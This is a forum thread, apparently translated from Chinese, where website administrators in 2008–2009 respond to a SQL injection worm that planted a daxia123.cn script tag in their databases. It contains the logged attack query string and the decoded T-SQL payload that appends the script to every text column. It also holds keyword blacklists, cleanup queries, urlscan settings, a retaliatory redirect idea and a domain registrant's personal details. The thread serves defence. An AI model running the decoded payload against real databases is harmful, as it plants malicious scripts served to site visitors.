瑞星卡卡安全论坛 (Rising Kaka Security Forum)
sweet28 - 2008-12-30 10:45:00
After using this anti-injection code the site seems safe for now, but with it in place, normal news publishing no longer works either.
huangguaxuan - 2008-12-30 11:18:00
When the anti-injection code is added, some things can no longer be submitted because the injection filter blocks certain words. Check the log to see which word was filtered, e.g. quotes, or words such as "brand" or "action=select", which get filtered because they contain "and" and "select", so the submission fails. Usually these are in the POST filter list; just delete those frequently occurring words from it. Better still is to write your own code to do the check; if some expert can write one, please post it and share.
I also added the anti-injection code; for the few places that need to submit content I use a separate database-connection page and removed some of the words from that one.
Added it yesterday, and no problems so far today.... still watching.....
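The false positives described above are a property of the filter's substring test, and the better fix the poster hopes for is to stop inspecting content for keywords and bind it as a query parameter instead. The Python below is an added example written for this thread, not code from the forum or from any of the posters; it uses an in-memory SQLite table as a stand-in for the MSSQL news table and a subset of the keyword list that appears in the anti-injection code posted in this thread.

```python
import sqlite3

# Subset of the sql_leach keyword list posted in this thread (the hex fragments
# are left out; they never match ordinary text anyway).
BLACKLIST = ["'", "and", "exec", "insert", "select", "delete", "update",
             "count", "chr", "mid", "master", "truncate", "char", "declare"]


def blacklist_hits(value):
    """Reproduce the ASP filter's test, InStr(value, token) > 0, which is a
    case-insensitive substring match. Returns every token found, so the caller
    can see exactly why a harmless string such as "brand" would be rejected."""
    low = value.lower()
    return [tok for tok in BLACKLIST if tok in low]


def open_demo_db():
    """In-memory SQLite stand-in for the news table (constructed for this example)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    return conn


def insert_news(conn, title):
    """Store a title using a bound parameter. The title travels as data, never
    as SQL text, so quotes or keywords inside it cannot change the statement,
    and no keyword blacklist is needed to publish it. Returns the row count."""
    conn.execute("INSERT INTO news (title) VALUES (?)", (title,))
    conn.commit()
    return conn.execute("SELECT COUNT(*) FROM news").fetchone()[0]


def stored_titles(conn):
    """Titles exactly as stored, in insertion order."""
    return [row[0] for row in conn.execute("SELECT title FROM news ORDER BY id")]


if __name__ == "__main__":
    for s in ["brand", "action=select", "Update on the master plan"]:
        print(f"{s!r} would be blocked because of {blacklist_hits(s)}")
    db = open_demo_db()
    insert_news(db, "Brand news: action=select")
    insert_news(db, "x'; DROP TABLE news; --")  # stored as a literal, not executed
    print(stored_titles(db))
```

The point of the second half is that the quote-laden title ends up in the table as plain text and the table still exists afterwards, which is why a parameterised insert needs no keyword list at all.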
流浪的熊 - 2008-12-30 18:41:00
Recently everyone has been hit hard by the injection virus served from daxia123.cn. A lookup shows the domain was registered by a Mr. 张国新; the record is as follows:
Domain: daxia123.cn
Domain status: clientHold
Registrant: 张新国
Admin contact email: he358@yahoo.cn
Registrar: 北京万网志成科技有限公司
Name server: dns27.hichina.com
Name server: dns28.hichina.com
Registration date: 2008-04-28 20:43
Expiry date: 2009-04-28 20:43
Please try to find and contact this person. The virus may not be his doing, but if the domain's resolution or redirect is stopped for now, the virus can be halted for the time being, which also gives everyone time to work out a fix. Friends who see this post, please help. I have already emailed the domain contact, but I don't know whether there will be a reply.
メ冰枫ぱ雪 - 2009-1-1 17:32:00
I have already rewritten the site's code; I believe that should take care of these problems..
schuman_ma - 2009-1-3 3:11:00
This is really a pain. Could some expert come forward with a thorough solution!
点石网络 - 2009-1-3 23:10:00
I got hit too.. but I used a rather clumsy workaround that treats the symptom, not the cause.. making do for now.
I simply filtered out the HTML code. In my case it all appeared in the site title, keywords and description, i.e. the site parameter settings.. so I strip the HTML when those values are output..
Still watching for the definitive fix!
bobo7810 - 2009-1-4 14:57:00
Hit for over two weeks now; restoring the database doesn't help, and the site has been down the whole time. Which of the methods above actually works?
zhidao1 - 2009-1-7 10:39:00
Adding anti-injection code does stop daxia123,
but then articles can't be published and images can't be uploaded anymore. Could some expert solve this!
The anti-injection code I added is:
```asp
<%
Dim sql_leach, sql_leach_0, Sql_Data, SQL_Get, Sql_Post
sql_leach = "',and,exec,insert,select,delete,update,count,chr,mid,master,truncate,char,declare,0x4445434C4152452040542056415243484,4152452040542056415243484152283235352,0x4445434C415245204054205,48415228323535292C4043205641524,22832353529204445434C415245205,61626C655F437572736F7220435552534F5220464F52205345,45435420612E6E616D652C622E6E616D652046524F4D207379736F626A656, <script,92C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435,F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970,5204054205641524348415228323535292C404320564152434,VaRcHaR,sYsDaTaBaSeS,sElEcT,dEcLaRe"
' The list above is the usual anti-injection character set plus the
' hex fragments specific to this trojan.
sql_leach_0 = Split(sql_leach, ",")

' Check every query-string parameter against every token in the list
If Request.QueryString <> "" Then
    For Each SQL_Get In Request.QueryString
        For Sql_Data = 0 To UBound(sql_leach_0)
            If InStr(Request.QueryString(SQL_Get), sql_leach_0(Sql_Data)) > 0 Then
                Response.Write "请不要提交可注入的字符串!非法字符为" & sql_leach_0(Sql_Data)
                Response.End
            End If
        Next
    Next
End If

' Same check for every form (POST) field
If Request.Form <> "" Then
    For Each Sql_Post In Request.Form
        For Sql_Data = 0 To UBound(sql_leach_0)
            If InStr(Request.Form(Sql_Post), sql_leach_0(Sql_Data)) > 0 Then
                Response.Write "请不要提交可注入的字符串!非法字符为" & sql_leach_0(Sql_Data)
                Response.End
            End If
        Next
    Next
End If
%>
```
There is one more key problem: as soon as I put this code into conn.asp, it reports
a Dim error, "Name redefined" (名称重定义).
No matter how complicated I make the variable names, it makes no difference.
低级网管 - 2009-1-9 13:45:00
Your post has been very useful, but there is one problem: ntext and text columns can't be modified. Could you please add something for those? Many thanks.
低级网管 - 2009-1-9 13:57:00
```sql
-- 数据库名称 = database name, 表名称 = table name, 列名称 = column name,
-- '修改的字符' = the string to be removed
use 数据库名称
update 表名称 set 列名称=replace(CAST(列名称 AS varchar(8000)),'修改的字符',' ')
```
This is for modifying text and ntext columns, but I couldn't integrate it into 水上飞云's code. I could only locate by hand the columns that 水上飞云's code cannot modify and then run this query on them. Hoping 水上飞云 can combine my code with yours and integrate it into your script.
淘气学子 - 2009-1-9 14:20:00
Use DW to batch-delete that code; it is an illegal malicious link.
低级网管 - 2009-1-9 14:40:00
It isn't in the page code; it is written directly into the database.
水上飞云 - 2009-1-9 17:56:00
```sql
/* Define the string to remove. Note: there may be more than one;
   on my server I found two. */
declare @delStr nvarchar(500)
set @delStr='<script src=http://cn.daxia123.cn/cn.js></script>'
--set @delStr='<script src=http://cn.jxmmtv.com/cn.js></script>'
/* The actual work starts here */
set nocount on
declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)
set @iResult=0
-- outer cursor: every user table (xtype='U')
declare cur cursor for
select name,id from sysobjects where xtype='U'
open cur
fetch next from cur into @tableName,@tbID
while @@fetch_status=0
begin
  -- inner cursor: the character columns of this table
  -- xtype 231 nvarchar, 167 varchar, 239 nchar, 175 char, 99 ntext, 35 text
  declare cur1 cursor for
  select name from syscolumns where xtype in (231,167,239,175,99,35) and id=@tbID
  open cur1
  fetch next from cur1 into @columnName
  while @@fetch_status=0
  begin
    -- convert first so that replace() also works on text/ntext columns
    set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace(convert(nvarchar(4000),['+@columnName+']),'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%'''
    exec sp_executesql @sql
    set @iRow=@@rowcount
    set @iResult=@iResult+@iRow
    if @iRow>0
    begin
      print '表:'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;'
    end
    fetch next from cur1 into @columnName
  end
  close cur1
  deallocate cur1
  fetch next from cur into @tableName,@tbID
end
print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!'
close cur
deallocate cur
set nocount off
/* end of the operation */
```
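As an added example (not from the forum or from 水上飞云), the same sweep in Python over SQLite: it enumerates character columns through sqlite_master and PRAGMA table_info instead of sysobjects/syscolumns, and it generalises the fixed @delStr to any `<script src=...></script>` tag, which also covers the second URL the script's comment mentions. The tables and rows are constructed sample data; the function and table names are this example's own.

```python
import re
import sqlite3

# The tag shape the worm appends to character columns. Matching any host
# rather than one fixed string also catches the second URL from the thread.
INJECTED_TAG = re.compile(r"<script\s+src=[^>]*></script>", re.IGNORECASE)


def text_columns(conn):
    """Yield (table, column) for every character-typed column of every user
    table: the sqlite counterpart of the sysobjects/syscolumns lookup above."""
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        for _cid, name, ctype, *_ in conn.execute(f'PRAGMA table_info("{table}")'):
            if any(k in ctype.upper() for k in ("CHAR", "TEXT", "CLOB")):
                yield table, name


def find_injections(conn):
    """Read-only pass: {(table, column): {distinct injected tags found}}."""
    found = {}
    for table, col in text_columns(conn):
        rows = conn.execute(f'SELECT "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
                            ("%<script%",))
        for (value,) in rows:
            for tag in INJECTED_TAG.findall(value or ""):
                found.setdefault((table, col), set()).add(tag)
    return found


def strip_injections(conn):
    """Remove every matched tag. Returns the number of (row, column) updates,
    counted the way the T-SQL script totals @@rowcount per column."""
    updated = 0
    for table, col in text_columns(conn):
        rows = conn.execute(f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?',
                            ("%<script%",)).fetchall()
        for rowid, value in rows:
            cleaned = INJECTED_TAG.sub("", value)
            if cleaned != value:
                conn.execute(f'UPDATE "{table}" SET "{col}"=? WHERE rowid=?', (cleaned, rowid))
                updated += 1
    conn.commit()
    return updated


def build_sample_db():
    """Constructed sample: two tables with the tags from this thread appended."""
    daxia = "<script src=http://cn.daxia123.cn/cn.js></script>"
    jxmm = "<script src=http://cn.jxmmtv.com/cn.js></script>"
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title VARCHAR(200), body TEXT)")
    conn.execute("CREATE TABLE config (id INTEGER PRIMARY KEY, site_name NVARCHAR(100))")
    conn.execute("INSERT INTO news (title, body) VALUES (?, ?)",
                 ("Hello" + daxia, "Body text" + daxia))
    conn.execute("INSERT INTO news (title, body) VALUES (?, ?)", ("Clean title", "Clean body"))
    conn.execute("INSERT INTO config (site_name) VALUES (?)", ("My Site" + jxmm,))
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for (table, col), tags in find_injections(db).items():
        print(f"{table}.{col}: {sorted(tags)}")
    print("updates:", strip_injections(db))
    print("remaining:", find_injections(db))
```

Running the read-only pass first and looking at the distinct tags it reports is the step the T-SQL comment asks for ("there may be more than one"); only then is the destructive pass worth running.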
水上飞云 - 2009-1-9 17:59:00
This thing is an attack on ASP pages; the log shows it like this (hex payload elided):
```text
QUERY_STRING:matchid=155;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(...%20aS%20VaRcHaR(4000));eXeC(@s);--
```
The hex in the middle decodes to:
```sql
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u'
AND b.xtype in (99,35,231,167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
print ('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
```
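A detector for this shape of request, written as an added example for this thread (not the poster's code): it URL-decodes a logged query string, matches the DECLARE ... CAST(0x... AS VARCHAR) ... EXEC pattern case-insensitively, decodes the hex (single-byte text for VARCHAR, UTF-16LE for the NVARCHAR variant) and pulls out the script URL the payload would append. The sample log lines are constructed, and their hex is generated from a short stand-in statement rather than from the full cursor script above.

```python
import binascii
import re
from urllib.parse import unquote

# The DECLARE/CAST(0x...)/EXEC shape of the injected query string seen in the
# log excerpt. Case-insensitive because the worm mixes case (dEcLaRe, cAsT,
# eXeC); the optional "n" accepts both the VARCHAR and NVARCHAR variants.
HEX_CAST = re.compile(
    r"declare\s+@\w+\s+(?P<n>n?)varchar\s*\(\s*\d+\s*\)\s*"
    r"set\s+@\w+\s*=\s*cast\s*\(\s*0x(?P<hex>[0-9a-f]+)\s+as\s+n?varchar\s*\(\s*\d+\s*\)\s*\)\s*;?\s*"
    r"exec\s*\(\s*@\w+\s*\)",
    re.IGNORECASE,
)
SCRIPT_SRC = re.compile(r"<script\s+src=([^>\s]+)", re.IGNORECASE)


def decode_hex_payload(hexstr, unicode_text):
    """CAST(0x.. AS VARCHAR) carries single-byte text; the NVARCHAR form is UTF-16LE."""
    raw = binascii.unhexlify(hexstr)
    return raw.decode("utf-16-le" if unicode_text else "latin-1")


def scan_query_string(qs):
    """Return a finding dict for one raw query string, or None if it is clean."""
    m = HEX_CAST.search(unquote(qs))
    if not m:
        return None
    payload = decode_hex_payload(m.group("hex"), bool(m.group("n")))
    src = SCRIPT_SRC.search(payload)
    return {"payload": payload, "script_src": src.group(1) if src else None}


def scan_log(lines):
    """Run scan_query_string over log lines of the form 'QUERY_STRING:<raw qs>'."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        if not line.startswith("QUERY_STRING:"):
            continue
        finding = scan_query_string(line[len("QUERY_STRING:"):])
        if finding:
            finding["line"] = lineno
            findings.append(finding)
    return findings


# Constructed sample: one worm-style request whose hex is built here from a
# short stand-in statement, plus two ordinary requests that must not match.
PAYLOAD = ("UPDATE [news] SET [title]=RTRIM(CONVERT(VARCHAR(4000),[title]))"
           "+'<script src=http://cn.daxia123.cn/cn.js></script>'")
HEX = PAYLOAD.encode("ascii").hex().upper()
SAMPLE_LINES = [
    "QUERY_STRING:matchid=155",
    "QUERY_STRING:matchid=155;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x"
    + HEX + "%20aS%20VaRcHaR(4000));eXeC(@s);--",
    "QUERY_STRING:q=select%20your%20brand",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LINES):
        print(f"line {f['line']}: appends {f['script_src']}")
        print("  decoded payload:", f["payload"])
```

Matching the whole DECLARE/CAST/EXEC structure rather than the bare words "select" or "declare" is what keeps the third sample line (an ordinary search for "select your brand") from being reported, the same false-positive problem the keyword filters earlier in the thread run into.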
水上飞云 - 2009-1-9 18:06:00
The fix is to add anti-injection code to the ASP pages.
The attacker submits the URLs with a tool, as the HTTP headers show:
```text
ALL_HTTP:HTTP_HOST:finance.jmcatv.com.cn
HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP_COOKIE:ASPSESSIONIDSCATDTRT=BDMADAACPKFKLCNABMGEJONK
HTTP_CACHE_CONTROL:no-cache
ALL_RAW:Host: finance.jmcatv.com.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Cookie: ASPSESSIONIDSCATDTRT=BDMADAACPKFKLCNABMGEJONK
Cache-Control: no-cache
```
Returning a warning message is useless. Better to
redirect to some other page, e.g. make it download a piece of software, heh, a large file.
If the warning has no effect, put it on a blacklist, and on its next visit make it download:
```asp
' IsBlackIP and GetCIP are the poster's own helper functions (not shown)
If IsBlackIP(GetCIP) Then
    ' Blacklisted visitor: hand it a free antivirus as a warning! heh heh, poison!
    Response.Redirect "http://download.rising.com.cn/Middle/RavolSKY.exe"
End If
```
水上飞云 - 2009-1-9 18:11:00
For compromised sites with a large number of ASP pages, which need an ASP security check and batch insertion of anti-injection code, or batch removal of junk and illegal code from all static and dynamic pages, a simple program can be written in Delphi to handle it. If you can't, I have made one; leave your email and I will send you the program and source.
YMStudio - 2009-1-9 19:56:00
Found it this afternoon; I'm still working overtime on this damn database... Strongly condemn this pointless, shameless behaviour!!
I had just those few special pages without filtering and he bloody well found them, I'm crying~~~~ From now on EXEC definitely gets filtered!! Whatever~~ furious...
岩盐115 - 2009-1-10 13:26:00
I have suffered from it too, but fortunately I have my own server, so I could install urlscan and set a URL length limit. It is holding for now; several attacks a day have been blocked. Looking at the IP addresses, most are from Korea, with some from the US, Qatar and domestic ones.
不帅的阿桂 - 2009-1-10 14:28:00
Could the poster above explain in more detail?
不帅的阿桂 - 2009-1-10 14:37:00
Could the poster above explain specifically how to configure urlscan?
岩盐115 - 2009-1-11 17:00:00
My urlscan.ini settings are as follows:
```ini
[options]
UseAllowVerbs=1 ; If 1, use [AllowVerbs] section, else use the
; [DenyVerbs] section.
UseAllowExtensions=0 ; If 1, use [AllowExtensions] section, else use
; the [DenyExtensions] section.
NormalizeUrlBeforeScan=1 ; If 1, canonicalize URL before processing.
VerifyNormalization=1 ; If 1, canonicalize URL twice and reject request
; if a change occurs.
AllowHighBitCharacters=0 ; If 1, allow high bit (ie. UTF8 or MBCS)
; characters in URL.
AllowDotInPath=0 ; If 1, allow dots that are not file extensions.
RemoveServerHeader=0 ; If 1, remove the 'Server' header from response.
EnableLogging=1 ; If 1, log UrlScan activity.
PerProcessLogging=0 ; If 1, the UrlScan.log filename will contain a PID
; (ie. UrlScan.123.log).
AllowLateScanning=0 ; If 1, then UrlScan will load as a low priority
; filter.
PerDayLogging=1 ; If 1, UrlScan will produce a new log each day with
; activity in the form 'UrlScan.010101.log'.
UseFastPathReject=0 ; If 1, then UrlScan will not use the
; RejectResponseUrl or allow IIS to log the request.
LogLongUrls=0 ; If 1, then up to 128K per request can be logged.
; If 0, then only 1k is allowed.
;
; If UseFastPathReject is 0, then UrlScan will send
; rejected requests to the URL specified by RejectResponseUrl.
; If not specified, '/<Rejected-by-UrlScan>' will be used.
;
RejectResponseUrl=
;
; LoggingDirectory can be used to specify the directory where the
; log file will be created. This value should be the absolute path
; (ie. c:\some\path). If not specified, then UrlScan will create
; the log in the same directory where the UrlScan.dll file is located.
;
LoggingDirectory=G:\WINNT\system32\inetsrv\urlscan\logs
;
; If RemoveServerHeader is 0, then AlternateServerName can be
; used to specify a replacement for IIS's built in 'Server' header
;
AlternateServerName=
[RequestLimits]
;
; The entries in this section impose limits on the length
; of allowed parts of requests reaching the server.
;
; It is possible to impose a limit on the length of the
; value of a specific request header by prepending "Max-" to the
; name of the header. For example, the following entry would
; impose a limit of 100 bytes to the value of the
; 'Content-Type' header:
;
; Max-Content-Type=100
;
; To list a header and not specify a maximum value, use 0
; (ie. 'Max-User-Agent=0'). Also, any headers not listed
; in this section will not be checked for length limits.
;
; There are 3 special case limits:
;
; - MaxAllowedContentLength specifies the maximum allowed
; numeric value of the Content-Length request header. For
; example, setting this to 1000 would cause any request
; with a content length that exceeds 1000 to be rejected.
; The default is 30000000.
;
; - MaxUrl specifies the maximum length of the request URL,
; not including the query string. The default is 260 (which
; is equivalent to MAX_PATH).
;
; - MaxQueryString specifies the maximum length of the query
; string. The default is 2048.
;
MaxAllowedContentLength=30000000
MaxUrl=80
MaxQueryString=75
[AllowVerbs]
;
; The verbs (aka HTTP methods) listed here are those commonly
; processed by a typical IIS server.
;
; Note that these entries are effective if "UseAllowVerbs=1"
; is set in the [Options] section above.
;
GET
HEAD
POST
[DenyVerbs]
;
; The verbs (aka HTTP methods) listed here are used for publishing
; content to an IIS server via WebDAV.
;
; Note that these entries are effective if "UseAllowVerbs=0"
; is set in the [Options] section above.
;
PROPFIND
PROPPATCH
MKCOL
DELETE
PUT
COPY
MOVE
LOCK
UNLOCK
OPTIONS
SEARCH
[DenyHeaders]
;
; The following request headers alter processing of a
; request by causing the server to process the request
; as if it were intended to be a WebDAV request, instead
; of a request to retrieve a resource.
;
Translate:
If:
Lock-Token:
Transfer-Encoding:
[AllowExtensions]
;
; Extensions listed here are commonly used on a typical IIS server.
;
; Note that these entries are effective if "UseAllowExtensions=1"
; is set in the [Options] section above.
;
.htm
.html
.txt
.jpg
.jpeg
.gif
[DenyExtensions]
;
; Extensions listed here either run code directly on the server,
; are processed as scripts, or are static files that are
; generally not intended to be served out.
;
; Note that these entries are effective if "UseAllowExtensions=0"
; is set in the [Options] section above.
;
; Also note that ASP scripts are denied with the below
; settings. If you wish to enable ASP, remove the
; following extensions from this list:
; .asp
; .cer
; .cdx
; .asa
;
; Deny ASP requests
.cer
.cdx
.asa
; Deny executables that could run on the server
.exe
.bat
.cmd
.com
; Deny infrequently used scripts
.htw ; Maps to webhits.dll, part of Index Server
.ida ; Maps to idq.dll, part of Index Server
.idq ; Maps to idq.dll, part of Index Server
.htr ; Maps to ism.dll, a legacy administrative tool
.idc ; Maps to httpodbc.dll, a legacy database access tool
.shtm ; Maps to ssinc.dll, for Server Side Includes
.shtml ; Maps to ssinc.dll, for Server Side Includes
.stm ; Maps to ssinc.dll, for Server Side Includes
.printer ; Maps to msw3prt.dll, for Internet Printing Services
; Deny various static files
.ini ; Configuration files
.log ; Log files
.pol ; Policy files
.dat ; Configuration files
[DenyUrlSequences]
.. ; Don't allow directory traversals
./ ; Don't allow trailing dot on a directory name
\ ; Don't allow backslashes in URL
: ; Don't allow alternate stream access
% ; Don't allow escaping after normalization
& ; Don't allow multiple CGI processes to run on a single request
@
declare
select
```
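Added example, not UrlScan's own code and not the poster's: a simplified model of the request limits in the ini above, using its MaxUrl, MaxQueryString and [DenyUrlSequences] values, to show what those settings accept and reject. It assumes the deny sequences are matched against the path only and that the query string is subject to the length limit; check the documentation of your UrlScan version for which parts it actually scans. The request targets are constructed; the attack-shaped one has its hex payload shortened to a few bytes.

```python
# Values copied from the urlscan.ini above; DENY_SEQUENCES is its
# [DenyUrlSequences] section. Simplified model for this thread, not UrlScan's
# logic: sequences are checked against the path only (assumption), lengths
# against path and query string separately, in the order UrlScan's ini
# comments describe them.
MAX_URL = 80
MAX_QUERY_STRING = 75
DENY_SEQUENCES = ["..", "./", "\\", ":", "%", "&", "@", "declare", "select"]

# Constructed request targets. ATTACK mimics the shape of the QUERY_STRING
# logged earlier in the thread with the hex payload cut down to a few bytes.
ATTACK = ("/news/list.asp?matchid=155;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT("
          "0x4445434C41524520405420564152434841522832353529"
          "%20aS%20VaRcHaR(4000));eXeC(@s);--")
NORMAL = "/news/list.asp?matchid=155&page=2"
LONG_LEGIT = "/news/search.asp?keyword=" + "a" * 60 + "&page=2&sort=date"
TRAVERSAL = "/images/../conn.asp"


def check_request(target):
    """Return (allowed, reason) for a request target such as '/a.asp?x=1'."""
    path, _, query = target.partition("?")
    if len(path) > MAX_URL:
        return False, "MaxUrl"
    if len(query) > MAX_QUERY_STRING:
        return False, "MaxQueryString"
    low = path.lower()
    for seq in DENY_SEQUENCES:
        if seq.lower() in low:
            return False, "DenyUrlSequences:" + seq
    return True, "allowed"


if __name__ == "__main__":
    for name, target in [("attack", ATTACK), ("normal", NORMAL),
                         ("long legitimate search", LONG_LEGIT), ("traversal", TRAVERSAL)]:
        allowed, reason = check_request(target)
        print(f"{name:24s} query={len(target.partition('?')[2]):3d} bytes -> {reason}")
```

The run makes the trade-off the poster accepted visible: the encoded payload is far longer than 75 bytes, so MaxQueryString=75 rejects it regardless of the keywords it contains, but an ordinary search form whose query string passes 75 bytes is rejected by the same rule.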
岩盐115 - 2009-1-11 17:01:00
Hope this helps.
不帅的阿桂 - 2009-1-12 15:05:00
Which version is yours?
lyaiqin99 - 2009-1-14 20:05:00
I am also looking for a solution.
tannutao - 2009-1-16 23:18:00
[This user's post content has been hidden]
Nonee - 2009-1-23 15:20:00
```sql
UPDATE TABLENAME set COLNAME= REPLACE(convert(varchar(8000),COLNAME),'muma.js','')
```
MS SQL's NTEXT does not support REPLACE; convert it to VARCHAR or NVARCHAR first.
allenxing - 2009-2-24 10:05:00
Originally posted by 岩盐115 on 2009-1-11 17:00:00:
    My urlscan.ini settings are as follows:
    [options]
    UseAllowVerbs=1 ; If 1, use [AllowVerbs] section, else use the
    ; [DenyVerbs] section.
    UseAllowExtensions=0 ......
How do I actually use this? Could you explain in more detail? Many thanks!